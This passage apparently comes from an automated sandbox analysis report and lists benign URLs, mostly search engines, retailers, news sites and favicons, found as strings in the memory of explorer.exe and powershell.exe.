    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
    Source: powershell.exe, 00000016.00000002.10531052608.000001C93EFDD000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
    Source: powershell.exe, 00000016.00000002.10493820703.000001C92F054000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
    Source: file.htmlString found in binary or memory: http://s7d9.scene7.com/is/image/AdobeDemandCreative/?fmt=png&amp;size=240
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
    Source: powershell.exe, 00000016.00000002.10491858613.000001C92EE31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
    Source: mirroring_hangouts.js.1.drString found in binary or memory: http://tools.ietf.org/html/rfc1950
    Source: explorer.exe, 0000000C.00000000.9934649714.00000000051D0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
    Source: explorer.exe, 0000000C.00000000.9934649714.00000000051D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
    Source: explorer.exe, 0000000C.00000000.9835085405.0000000000850000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: explorer.exe, 0000000C.00000000.9993448286.000000000DC16000.00000004.00000001.sdmpString found in binary or memory: http://www.%s.comSoftware
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000016.00000002.10493820703.000001C92F054000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
    Source: mirroring_hangouts.js.1.drString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions
    Source: mirroring_hangouts.js.1.drString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
